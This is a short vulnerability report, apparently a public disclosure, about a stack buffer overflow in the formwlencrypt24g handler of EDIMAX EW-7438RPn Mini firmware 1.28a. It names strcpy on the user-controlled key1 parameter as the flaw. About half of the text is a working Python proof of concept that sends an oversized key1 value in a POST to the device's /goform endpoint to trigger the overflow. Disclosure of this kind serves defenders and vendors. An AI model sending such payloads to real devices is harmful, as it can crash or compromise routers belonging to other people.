EW-7438RPn Mini Firmware 1.28a (Version : 1.28a)
The EDIMAX EW-7438RPn Mini Firmware 1.28a (Version : 1.28a) firmware has a stack overflow vulnerability in the formwlencrypt24g function. The function receives the key1 parameter from a POST request. However, since the user can control the input of these parameters, the statement strcpy(v53, v27) can cause a buffer overflow.

import requests
ip = "192.168.153.2"
payload = "A" * 5000
data = {
"wlenabled": "yes",
"ssid": "TestAP",
"method": "1",
"chan": "6",
"wpaCipher": "1",
"wepEnabled": "ON",
"length": "1",
"format": "1",
"defaultTxKeyId": "1",
"key1": payload,
"pskFormat": "0",
"pskValue": "",
"submit-url": "/wireless.asp",
"CONN_TEST_TRUE": "",
}
url = f"http://{ip}/goform/formwlencrypt24g"
res = requests.post(url=url, data=data, verify=False)
print(res)
